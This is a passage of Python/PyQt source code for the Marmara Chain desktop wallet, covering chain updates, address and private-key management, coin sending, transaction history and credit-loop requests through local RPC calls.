\\n'\n index = index + 1\n self.fork_message_box(str(result_out[0][0]), fork_message)\n logging.info(fork_message)\n if result_out[1] == 'error':\n self.bottom_err_info(self.tr('Could not get info from explorer. Check your network connection'))\n logging.info('Could not get info from explorer. Check your network connection')\n elif result_out[2] == 1:\n self.bottom_err_info(result_out[1])\n\n def fork_message_box(self, result, message):\n fork_message_detail = \"\"\n if 3 <= self.fork_count <= 9:\n message = message + '\\n' + self.tr('Your node forked.')\n fork_message_detail = self.tr(\"To fix your node fork, stop the chain and start again. if the fork is not \"\n \"fixed, you may try downloading blocks.\")\n self.custom_message(self.tr('Comparing Chain with Explorers'), self.tr('Checked for block height ') +\n result + '\\n' + '\\n' + message, 'information', QMessageBox.Information,\n detailed_text=fork_message_detail)\n\n @pyqtSlot()\n def update_chain_latest(self):\n if not self.latest_chain_version:\n self.check_chain_update()\n if not self.chain_versiyon_tag and self.latest_chain_version:\n installed_chain_versiyon = self.get_installed_chain_version()\n if installed_chain_versiyon:\n self.update_chain_dialogbox(self.tr('your chain version'), self.chain_versiyon_tag)\n else:\n self.update_chain_dialogbox(self.tr('Could not get your version'), \"\")\n\n if self.latest_chain_version and self.chain_versiyon_tag:\n self.update_chain_dialogbox(self.tr('your chain version'), self.chain_versiyon_tag)\n\n def update_chain_dialogbox(self, message, version):\n message_box = self.custom_message('Marmara Chain Update', message +\n version + ' \\n' + self.tr('Latest available version ')\n + self.latest_chain_version, 'question', QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.start_animation()\n stopchain_thread = None\n if self.chain_status:\n stopchain_thread = self.stop_chain_thread()\n self.worker_update_chain = marmarachain_rpc.Autoinstall()\n self.worker_update_chain.moveToThread(self.thread_chain_update) # putting in to thread\n self.worker_update_chain.finished.connect(self.thread_chain_update.quit)\n self.worker_update_chain.finished.connect(self.stop_animation) # when finished close animation\n self.thread_chain_update.started.connect(self.worker_update_chain.update_chain)\n self.update_chain_textBrowser.clear()\n if stopchain_thread is None:\n self.thread_chain_update.start()\n else:\n stopchain_thread.finished.connect(self.thread_chain_update.start)\n self.update_chain_textBrowser.setVisible(True)\n self.worker_update_chain.out_text.connect(self.update_chain_progress)\n self.worker_update_chain.finished.connect(self.update_chain_finished)\n\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Update closed'))\n logging.info('Update closed')\n\n @pyqtSlot(str)\n def update_chain_progress(self, out):\n self.update_chain_textBrowser.append(out)\n\n @pyqtSlot()\n def update_chain_finished(self):\n if self.get_installed_chain_version():\n self.custom_message(self.tr('Update finished'), self.tr('marmara chain ') +\n self.get_installed_chain_version() + self.tr(' update finished.'), 'information',\n QMessageBox.Information)\n self.update_chain_textBrowser.setVisible(False)\n self.check_chain_update()\n else:\n self.custom_message(self.tr('Update Failed'), self.tr('Something went wrong update failed.'), 'information')\n\n @pyqtSlot()\n def toggle_textbrowser(self):\n if self.update_chain_textBrowser.isVisible():\n self.update_chain_textBrowser.setVisible(False)\n 
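# hiding the log browser also hides the reindex/rescan options; the else branch re-shows them only while the chain is stopped\n 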
self.rescan_checkBox.setVisible(False)\n self.reindex_checkBox.setVisible(False)\n else:\n self.update_chain_textBrowser.setVisible(True)\n if not self.chain_status:\n self.rescan_checkBox.setVisible(True)\n self.reindex_checkBox.setVisible(True)\n\n # ------------------\n # Chain --- wallet Address Add, import\n # -------------------\n @pyqtSlot()\n def change_address_frame_visibility(self):\n if self.add_with_seed_radiobutton.isChecked():\n self.new_address_frame.setEnabled(False)\n self.add_seed_address_frame.setEnabled(True)\n if self.add_without_seed_radiobutton.isChecked():\n self.new_address_frame.setEnabled(True)\n self.add_seed_address_frame.setEnabled(False)\n\n @pyqtSlot()\n def get_address_page(self):\n self.chain_stackedWidget.setCurrentIndex(1)\n self.passphrase_TextEdit.clear()\n self.confirm_passphrase_TextEdit.clear()\n\n @pyqtSlot()\n def get_new_address(self):\n self.worker_get_newaddress = marmarachain_rpc.RpcHandler()\n message_box = self.custom_message(self.tr('Creating New Address'),\n self.tr(\"You are about to create a new address. Are you sure?\"),\n \"question\",\n QMessageBox.Question)\n\n if message_box == QMessageBox.Yes:\n method = cp.getnewaddress\n params = []\n self.worker_thread(self.thread_getnewaddress, self.worker_get_newaddress, method, params,\n self.set_getnewaddress_result)\n\n @pyqtSlot(tuple)\n def set_getnewaddress_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n # self.bottom_info('new address = ' + str(result_out[0]))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def convertpassphrase(self):\n verified = False\n seed = self.passphrase_TextEdit.toPlainText()\n confirm_seed = self.confirm_passphrase_TextEdit.toPlainText()\n if seed:\n if seed == confirm_seed:\n verified = True\n else:\n self.bottom_info(self.tr('seed words do not match'))\n logging.warning('seed words do not match')\n else:\n self.bottom_info(self.tr('write some seed words!'))\n logging.warning('write some seed words!')\n if verified:\n self.worker_convert_passphrase = marmarachain_rpc.RpcHandler()\n method = cp.convertpassphrase\n params = [seed]\n self.worker_thread(self.thread_convertpassphrase, self.worker_convert_passphrase, method, params,\n self.convertpassphrase_result)\n\n @pyqtSlot(tuple)\n def convertpassphrase_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n wif = result['wif']\n message_box = self.custom_message(self.tr('Creating an Address'),\n self.tr(\"An address has been created with details below. Do you want to \"\n \"import this address to the wallet?\") +\n self.tr(\"\\n    Seed =\\n    \") + result['agamapassphrase'] +\n self.tr(\"\\n    Private Key =\\n    \") + wif +\n self.tr(\"\\n    Address =\\n    \") + result['address'] +\n self.tr(\"\\n    Pubkey =\\n
    \") + result['pubkey'],\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.get_importprivkey(wif)\n\n # for error handling of convertpassphrase method\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def importprivkey(self):\n privkey = self.privkey_lineEdit.text()\n if privkey:\n self.get_importprivkey(privkey)\n else:\n self.bottom_info(self.tr('write private key first'))\n logging.warning('write private key first')\n\n def get_importprivkey(self, wif):\n self.worker_importprivkey = marmarachain_rpc.RpcHandler()\n method = cp.importprivkey\n params = [wif]\n self.worker_thread(self.thread_importprivkey, self.worker_importprivkey, method, params,\n self.set_importprivkey_result)\n\n @pyqtSlot(tuple)\n def set_importprivkey_result(self, result_out):\n if result_out[0]:\n self.bottom_info(str(result_out[0]))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def back_chain_widget_index(self):\n self.chain_stackedWidget.setCurrentIndex(0)\n if self.chain_status:\n self.getaddresses()\n else:\n self.update_addresses_table()\n\n @pyqtSlot()\n def see_privkey_page(self):\n self.chain_stackedWidget.setCurrentIndex(2)\n self.get_privkey_table()\n\n def get_privkey_table(self):\n self.worker_getaddress_privkey = marmarachain_rpc.RpcHandler()\n method = cp.getaddressesbyaccount\n params = ['']\n self.worker_thread(self.thread_address_privkey, self.worker_getaddress_privkey, method, params,\n self.set_privkey_table_result)\n\n @pyqtSlot(tuple)\n def set_privkey_table_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n self.addresses_privkey_tableWidget.setRowCount(len(result))\n self.addresses_privkey_tableWidget.setSortingEnabled(False)\n for address in result:\n row_number = result.index(address)\n btn_seeprivkey = QPushButton(qta.icon('mdi.shield-key', color='#cc2900'), '')\n btn_seeprivkey.setIconSize(QSize(32, 32))\n self.addresses_privkey_tableWidget.setCellWidget(row_number, 1, btn_seeprivkey)\n self.addresses_privkey_tableWidget.setItem(row_number, 0, QTableWidgetItem(address))\n self.addresses_privkey_tableWidget.horizontalHeader().setSectionResizeMode(0,\n QHeaderView.ResizeToContents)\n self.addresses_privkey_tableWidget.horizontalHeader().setSectionResizeMode(1,\n QHeaderView.ResizeToContents)\n btn_seeprivkey.clicked.connect(self.set_seeprivkey)\n self.addresses_privkey_tableWidget.setSortingEnabled(True)\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def set_seeprivkey(self):\n button = self.sender()\n index = self.addresses_privkey_tableWidget.indexAt(button.pos())\n if index.isValid():\n address = self.addresses_privkey_tableWidget.item(index.row(), 0).text()\n self.worker_see_privkey = marmarachain_rpc.RpcHandler()\n method = cp.dumpprivkey\n params = [address]\n self.worker_thread(self.thread_seeprivkey, self.worker_see_privkey, method, params,\n self.get_seeprivkey_result)\n\n @pyqtSlot(tuple)\n def get_seeprivkey_result(self, result_out):\n if result_out[0]:\n message_box = self.custom_message(self.tr('Private Key'),\n result_out[0],\n \"information\",\n QMessageBox.Information)\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # --------------------------------------------------------------------\n # Wallet page functions\n # --------------------------------------------------------------------\n def marmarainfo(self, pubkey, worker_output):\n self.bottom_info(self.tr('getting marmarainfo, please wait'))\n 
self.worker_marmarainfo = marmarachain_rpc.RpcHandler()\n method = cp.marmarainfo\n params = ['0', '0', '0', '0', pubkey]\n self.worker_thread(self.thread_marmarainfo, self.worker_marmarainfo, method, params,\n worker_output=worker_output)\n\n @pyqtSlot()\n def get_wallet_loopinfo(self):\n pubkey = self.current_pubkey_value.text()\n self.marmarainfo(pubkey, self.marmarinfo_amount_and_loops_result)\n\n @pyqtSlot()\n def get_address_amounts(self):\n pubkey = self.current_pubkey_value.text()\n logging.info('---- current pubkey : ' + pubkey)\n if pubkey and self.myCCActivatedAddress is None:\n self.marmarainfo(pubkey, self.marmarinfo_amount_and_loops_result)\n if pubkey and self.myCCActivatedAddress:\n self.worker_get_address_amounts = marmarachain_rpc.RpcHandler()\n self.worker_thread(self.thread_get_address_amounts, self.worker_get_address_amounts,\n worker_output=self.set_address_amounts, execute='get_balances')\n if not pubkey:\n self.bottom_info(self.tr('pubkey is not set!'))\n logging.warning('pubkey is not set!')\n\n @pyqtSlot(tuple)\n def set_address_amounts(self, result_out):\n if result_out[3] == 0:\n self.wallet_total_normal_value.setText(str(result_out[0]))\n if len(result_out[1]) > 0:\n address_result_out = result_out[1][0]\n else:\n address_result_out = result_out[1]\n for address in address_result_out:\n if address[0] == self.currentaddress_value.text():\n self.normal_amount_value.setText(str(address[1]))\n TotalAmountOnActivated = 0.0\n for activated in result_out[2].get('WalletActivatedAddresses'):\n TotalAmountOnActivated = TotalAmountOnActivated + activated.get('amount')\n if activated.get('activatedaddress') == self.myCCActivatedAddress:\n self.activated_amount_value.setText(str(activated.get('amount')))\n self.wallet_total_activated_value.setText(str(TotalAmountOnActivated))\n elif result_out[3] == 1:\n self.bottom_info(self.tr('Error getting address amounts'))\n logging.warning(str(result_out[0]))\n logging.warning(str(result_out[1]))\n logging.warning(str(result_out[2]))\n\n @pyqtSlot()\n def marmaralock_amount(self):\n if self.lock_amount_value.text() != \"\":\n self.worker_marmaralock = marmarachain_rpc.RpcHandler()\n method = cp.marmaralock\n params = [self.lock_amount_value.text()]\n self.worker_thread(self.thread_marmaralock, self.worker_marmaralock, method, params,\n self.marmaralock_amount_result)\n\n @pyqtSlot(tuple)\n def marmaralock_amount_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n logging.info(result)\n if result['result'] == 'success':\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to activate ') + self.lock_amount_value.text()\n + ' MCL',\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result['hex'])\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n if result.get('error'):\n self.bottom_info(str(result['error']))\n logging.error(str(result['error']))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def marmaraunlock_amount(self):\n if self.unlock_amount_value.text() != \"\":\n self.worker_marmaraunlock = marmarachain_rpc.RpcHandler()\n method = cp.marmaraunlock\n params = [self.unlock_amount_value.text()]\n self.worker_thread(self.thread_marmaraunlock, self.worker_marmaraunlock, method, params,\n self.marmaraunlock_amount_result)\n\n @pyqtSlot(tuple)\n def marmaraunlock_amount_result(self, 
result_out):\n if result_out[0]:\n logging.info(result_out[0])\n logging.info(str(result_out[0]).find('result'))\n if str(result_out[0]).find('result') == -1:\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to unlock ') +\n self.unlock_amount_value.text() + ' MCL',\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result_out[0].replace('\"', ''))\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n else:\n result = json.loads(result_out[0])\n logging.info(result)\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # --------------------------------------------------------------------\n # sending raw transaction\n # --------------------------------------------------------------------\n\n def sendrawtransaction(self, hex):\n self.bottom_info(self.tr('Signing transaction'))\n logging.info('Signing transaction')\n self.worker_sendrawtransaction = marmarachain_rpc.RpcHandler()\n method = cp.sendrawtransaction\n params = [hex]\n time.sleep(0.1)\n self.worker_thread(self.thread_sendrawtransaction, self.worker_sendrawtransaction, method, params,\n self.sendrawtransaction_result)\n\n @pyqtSlot(tuple)\n def sendrawtransaction_result(self, result_out):\n if result_out[0]:\n result = str(result_out[0]).replace('\\n', '').replace('\"', '')\n self.bottom_info('txid: ' + result)\n logging.info('txid: ' + result)\n time.sleep(0.2) # wait for loading screen disappear\n self.custom_message(self.tr('Transaction Successful'), self.tr('TxId :') + result, \"information\")\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # --------------------------------------------------------------------\n # Coin Send-Receive page functions\n # --------------------------------------------------------------------\n @pyqtSlot()\n def create_currentaddress_qrcode(self):\n if self.currentaddress_value.text() != \"\":\n # creating a pix map of qr code\n qr = qrcode.QRCode(version=1, error_correction=qrcode.constants.ERROR_CORRECT_H, box_size=7, border=1)\n qr.add_data(self.currentaddress_value.text())\n # set image to the Icon\n qr_image = qr.make_image(image_factory=Image).pixmap()\n msg = QMessageBox()\n msg.setStyleSheet(self.selected_stylesheet)\n msg.setIcon(QMessageBox.Information)\n msg.setIconPixmap(qr_image)\n msg.setWindowTitle(self.currentaddress_value.text() + \" \")\n msg.setStandardButtons(QMessageBox.Close)\n msg.exec_()\n else:\n self.bottom_info(self.tr('no address value set'))\n logging.warning('no address value set')\n\n @pyqtSlot()\n def sendtoaddress(self):\n if self.receiver_address_lineEdit.text() == \"\":\n self.bottom_info(self.tr('enter a receiver address'))\n logging.info('enter a receiver address')\n else:\n if self.sending_amount_lineEdit.text() == \"\":\n self.bottom_info(self.tr('enter some amount to send'))\n logging.warning('enter some amount to send')\n else:\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to send ') +\n self.sending_amount_lineEdit.text() + self.tr(' MCL to ') +\n self.receiver_address_lineEdit.text(),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.worker_sendtoaddress = marmarachain_rpc.RpcHandler()\n method = cp.sendtoaddress\n params = [self.receiver_address_lineEdit.text(), 
self.sending_amount_lineEdit.text()]\n self.worker_thread(self.thread_sendtoaddress, self.worker_sendtoaddress, method, params,\n self.sendtoaddress_result)\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n\n @pyqtSlot(tuple)\n def sendtoaddress_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n self.bottom_info('txid : ' + str(result_out[0]).replace('\\n', ''))\n if result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def getaddresstxids(self):\n if self.chain_status:\n address = self.currentaddress_value.text()\n start_date = self.transactions_startdate_dateTimeEdit.dateTime()\n end_date = self.transactions_endtdate_dateTimeEdit.dateTime()\n start_height = int(self.currentblock_value_label.text()) - int(\n self.change_datetime_to_block_age(start_date))\n end_height = int(self.currentblock_value_label.text()) - int(self.change_datetime_to_block_age(end_date))\n if start_height < end_height:\n if end_date > datetime.now():\n end_height = self.currentblock_value_label.text()\n if address == \"\":\n self.bottom_info(self.tr('A pubkey is not set yet! Please set a pubkey first.'))\n logging.info('A pubkey is not set yet! Please set a pubkey first.')\n else:\n self.worker_getaddresstxids = marmarachain_rpc.RpcHandler()\n method = cp.getaddresstxids\n params = [{'addresses': [address], 'start': int(start_height), 'end': int(end_height)}]\n self.worker_thread(self.thread_getaddresstxids, self.worker_getaddresstxids, method, params,\n self.getaddresstxids_result, execute='txids_detail')\n else:\n self.bottom_info(self.tr('Start Date should be before the Stop Date'))\n logging.info('Start Date should be before the Stop Date')\n else:\n self.bottom_info(self.tr('Marmarachain is not started'))\n logging.warning('Marmarachain is not started')\n\n @pyqtSlot(tuple)\n def getaddresstxids_result(self, result_out):\n if result_out[1] == 0:\n self.transactions_tableWidget.setRowCount(len(result_out[0]))\n self.transactions_tableWidget.setSortingEnabled(False)\n if len(result_out[0]) == 0:\n self.transactions_tableWidget.setRowCount(0)\n self.bottom_err_info(self.tr(\"No transaction found between selected dates.\"))\n logging.error(\"No transaction found between selected dates.\")\n else:\n for txid in result_out[0]:\n self.bottom_info(self.tr(\"fetched transactions between selected dates.\"))\n row_number = result_out[0].index(txid)\n btn_explorer = QPushButton(qta.icon('mdi.firefox', color='#728FCE'), '')\n btn_explorer.setIconSize(QSize(24, 24))\n txid_date = datetime.fromtimestamp(txid[2]).date()\n self.transactions_tableWidget.setCellWidget(row_number, 0, btn_explorer)\n self.transactions_tableWidget.setItem(row_number, 1, QTableWidgetItem(str(txid[0])))\n self.transactions_tableWidget.setItem(row_number, 2, QTableWidgetItem(str(txid[1])))\n self.transactions_tableWidget.setItem(row_number, 3, QTableWidgetItem(str(txid_date)))\n self.transactions_tableWidget.horizontalHeader().setSectionResizeMode(0,\n QHeaderView.ResizeToContents)\n self.transactions_tableWidget.horizontalHeader().setSectionResizeMode(1,\n QHeaderView.ResizeToContents)\n self.transactions_tableWidget.horizontalHeader().setSectionResizeMode(2,\n QHeaderView.ResizeToContents)\n self.transactions_tableWidget.horizontalHeader().setSectionResizeMode(3,\n QHeaderView.ResizeToContents)\n btn_explorer.clicked.connect(self.open_in_explorer)\n self.transactions_tableWidget.setSortingEnabled(True)\n if result_out[1] == 1:\n 
self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def open_in_explorer(self):\n button = self.sender()\n index = self.transactions_tableWidget.indexAt(button.pos())\n if index.isValid():\n tx_id = self.transactions_tableWidget.item(index.row(), 1).text()\n url = 'https://explorer.marmara.io/tx/' + tx_id\n webbrowser.open_new(url)\n\n @pyqtSlot(int, int)\n def transaction_itemcontext(self, row, column):\n item = self.transactions_tableWidget.item(row, column).text()\n QtWidgets.QApplication.clipboard().setText(item)\n self.bottom_info(self.tr(\"Copied \") + str(item))\n\n # -------------------------------------------------------------------\n # Credit loops functions\n # --------------------------------------------------------------------\n\n # function name: change_datetime_to_block_age\n # purpose: converts the given datetime to a block age, assuming roughly one block per minute\n # usage: the calling function gets the int value of the block age between the current datetime and the date arg\n # example: a QDateTime two hours away (past or future) yields '120'\n # return: str value of block_age\n def change_datetime_to_block_age(self, date):\n selected_datetime = date.toPyDateTime()\n now = datetime.now()\n time_diff = abs(selected_datetime - now) # abs covers both directions; the old two-branch version left time_diff unset when the datetimes were equal\n block_age = int(time_diff.total_seconds() / 60)\n return str(block_age)\n\n def change_block_to_date(self, block):\n block_diff = int(block) - int(self.longestchain_value_label.text())\n maturity_date = datetime.now() + timedelta(minutes=block_diff)\n maturity_date_format = str(maturity_date.day) + \"/\" + str(maturity_date.month) + \"/\" + str(maturity_date.year)\n return maturity_date_format\n\n def check_pubkey_contact_name(self, pubkey):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n known_pubkey = pubkey\n for contact in contacts_data: # each contact set in contacts_data\n if contact[2] == pubkey: # contact[2] contact pubkey\n known_pubkey = contact[0] # contact[0] contact name\n break\n return known_pubkey\n\n @pyqtSlot()\n def set_request_date_state(self):\n if self.request_date_checkBox.checkState():\n self.request_dateTimeEdit.setEnabled(False)\n else:\n self.request_dateTimeEdit.setEnabled(True)\n self.request_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.request_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n\n @pyqtSlot()\n def change_visibilty_looprequestpubkey(self):\n if self.looprequest_currentpk_radioButton.isChecked():\n self.looprequest_otherpk_lineEdit.setHidden(True)\n self.contactpk_otherpk_looprequest_comboBox.setHidden(True)\n self.transferrequests_tableWidget.setColumnHidden(0, False)\n self.loop_request_tableWidget.setColumnHidden(0, False)\n self.loop_request_tableWidget.setRowCount(0)\n self.transferrequests_tableWidget.setRowCount(0)\n if self.looprequest_otherpk_radioButton.isChecked():\n self.looprequest_otherpk_lineEdit.setHidden(False)\n self.looprequest_otherpk_lineEdit.clear()\n self.contactpk_otherpk_looprequest_comboBox.setHidden(False)\n self.loop_request_tableWidget.setColumnHidden(0, True)\n self.transferrequests_tableWidget.setColumnHidden(0, True)\n self.loop_request_tableWidget.setRowCount(0)\n self.transferrequests_tableWidget.setRowCount(0)\n self.get_contact_names_pubkeys()\n\n @pyqtSlot()\n def get_selected_contact_pukey(self):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n selected_contactpubkey_transfer = contacts_data[self.contactpk_otherpk_looprequest_comboBox.currentIndex()]\n if selected_contactpubkey_transfer[2] != 'Pubkey':\n 
self.looprequest_otherpk_lineEdit.setText(selected_contactpubkey_transfer[2])\n if selected_contactpubkey_transfer[2] == 'Pubkey':\n self.looprequest_otherpk_lineEdit.clear()\n\n @pyqtSlot()\n def search_marmarareceivelist(self):\n pubkey = self.current_pubkey_value.text()\n if self.looprequest_otherpk_radioButton.isChecked():\n pubkey = self.looprequest_otherpk_lineEdit.text()\n if self.request_date_checkBox.checkState():\n maxage = '1440'\n else:\n date = self.request_dateTimeEdit.dateTime()\n maxage = self.change_datetime_to_block_age(date)\n logging.info('maxage ' + str(maxage))\n self.bottom_info(self.tr('searching incoming loop requests'))\n logging.info('querying incoming loop requests with marmarareceivelist')\n self.worker_marmarareceivelist = marmarachain_rpc.RpcHandler()\n method = cp.marmarareceivelist\n params = [pubkey, str(maxage)]\n self.worker_thread(self.thread_marmarareceivelist, self.worker_marmarareceivelist, method, params,\n self.search_marmarareceivelist_result)\n\n @pyqtSlot(tuple)\n def search_marmarareceivelist_result(self, result_out):\n if result_out[2] == 200 or result_out[2] == 0:\n self.bottom_info(self.tr('finished searching incoming loop requests'))\n logging.info('finished querying incoming loop requests')\n result = json.loads(str(result_out[0]))\n if type(result) == list:\n self.loop_request_tableWidget.setRowCount(len(result))\n loop_create_request_list = []\n loop_transfer_request_list = []\n for item in result:\n tx_id = item.get('txid')\n func_id = item.get('funcid')\n amount = item.get('amount')\n matures = item.get('matures')\n maturity = self.change_block_to_date(matures)\n receive_pk = item.get('receivepk')\n receive_pubkey = self.check_pubkey_contact_name(receive_pk)\n # issuer_pk = item.get('issuerpk')\n if func_id == 'B':\n row = [tx_id, amount, maturity, receive_pubkey, receive_pk]\n loop_create_request_list.append(row)\n if func_id == 'R':\n row = [tx_id, amount, maturity, receive_pubkey, receive_pk]\n loop_transfer_request_list.append(row)\n self.set_credit_request_table(loop_create_request_list)\n self.set_transfer_request_table(loop_transfer_request_list)\n if type(result) == dict:\n if result.get('result') == 'error':\n self.bottom_err_info(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def set_credit_request_table(self, credit_request_list):\n self.loop_request_tableWidget.setRowCount(len(credit_request_list))\n self.loop_request_tableWidget.setColumnHidden(5, True)\n self.loop_request_tableWidget.setSortingEnabled(False)\n for row in credit_request_list:\n row_number = credit_request_list.index(row)\n btn_review = QPushButton(qta.icon('mdi.text-box-check-outline', color='#728FCE'), '')\n btn_review.setIconSize(QSize(24, 24))\n self.loop_request_tableWidget.setCellWidget(row_number, 0, btn_review)\n self.loop_request_tableWidget.setItem(row_number, 1, QTableWidgetItem(str(row[0])))\n self.loop_request_tableWidget.setItem(row_number, 2, QTableWidgetItem(str(row[1])))\n self.loop_request_tableWidget.setItem(row_number, 3, QTableWidgetItem(str(row[2])))\n self.loop_request_tableWidget.setItem(row_number, 4, QTableWidgetItem(str(row[3])))\n self.loop_request_tableWidget.setItem(row_number, 5, QTableWidgetItem(str(row[4])))\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(2, 
QHeaderView.ResizeToContents)\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(3, QHeaderView.ResizeToContents)\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)\n btn_review.clicked.connect(self.review_creditloop_request)\n self.loop_request_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot()\n def review_creditloop_request(self):\n button = self.sender()\n index = self.loop_request_tableWidget.indexAt(button.pos())\n if index.isValid():\n tx_id = self.loop_request_tableWidget.item(index.row(), 1).text()\n receiver_pk = self.loop_request_tableWidget.item(index.row(), 5).text()\n self.marmaraissue(receiver_pk, tx_id)\n\n def set_transfer_request_table(self, transfer_request_list):\n self.transferrequests_tableWidget.setRowCount(len(transfer_request_list))\n self.transferrequests_tableWidget.setColumnHidden(5, True)\n self.transferrequests_tableWidget.setSortingEnabled(False)\n for row in transfer_request_list:\n row_number = transfer_request_list.index(row)\n btn_review = QPushButton(qta.icon('mdi.text-box-check-outline', color='#728FCE'), '')\n btn_review.setIconSize(QSize(24, 24))\n self.transferrequests_tableWidget.setCellWidget(row_number, 0, btn_review)\n self.transferrequests_tableWidget.setItem(row_number, 1, QTableWidgetItem(str(row[0])))\n self.transferrequests_tableWidget.setItem(row_number, 2, QTableWidgetItem(str(row[1])))\n self.transferrequests_tableWidget.setItem(row_number, 3, QTableWidgetItem(str(row[2])))\n self.transferrequests_tableWidget.setItem(row_number, 4, QTableWidgetItem(str(row[3])))\n self.transferrequests_tableWidget.setItem(row_number, 5, QTableWidgetItem(str(row[4])))\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(2, QHeaderView.ResizeToContents)\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(3, QHeaderView.ResizeToContents)\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)\n btn_review.clicked.connect(self.review_credittransfer_request)\n self.transferrequests_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot()\n def review_credittransfer_request(self):\n button = self.sender()\n index = self.transferrequests_tableWidget.indexAt(button.pos())\n if index.isValid():\n tx_id = self.transferrequests_tableWidget.item(index.row(), 1).text()\n receiver_pk = self.transferrequests_tableWidget.item(index.row(), 5).text()\n self.marmaratransfer(receiver_pk, tx_id)\n\n def marmaraissue(self, receiver_pk, txid):\n method = cp.marmaraissue\n params = [receiver_pk, {'avalcount': '0', 'autosettlement': 'true', 'autoinsurance': 'true',\n 'disputeexpires': 'offset', 'EscrowOn': 'false', 'BlockageAmount': '0'}, txid]\n self.worker_marmaraissue = marmarachain_rpc.RpcHandler()\n self.worker_thread(self.thread_marmaraissue, self.worker_marmaraissue, method, params, self.marmaraissue_result)\n\n @pyqtSlot(tuple)\n def marmaraissue_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n message_box = self.custom_message(self.tr('Create Credit Loop'),\n self.tr(\n \"You are about to create a credit loop with given details below:\") +\n \"\\n    Tx ID = \" + result.get('requesttxid') +\n \"\\n    Pubkey = \" + result.get('receiverpk'), \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result.get('hex'))\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def marmaratransfer(self, receiver_pk, tx_id):\n method = cp.marmaratransfer\n params = [receiver_pk, {'avalcount': '0'}, tx_id]\n self.worker_marmaratransfer = marmarachain_rpc.RpcHandler()\n self.worker_thread(self.thread_marmaratransfer, self.worker_marmaratransfer, method, params,\n self.marmaratransfer_result)\n\n @pyqtSlot(tuple)\n def marmaratransfer_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n message_box = self.custom_message(self.tr('Transfer Credit Loop'),\n self.tr(\"You are about to transfer your credit loop with given \"\n \"details below:\") +\n \"\\n    baton txid = \" + result.get('batontxid') +\n \"\\n
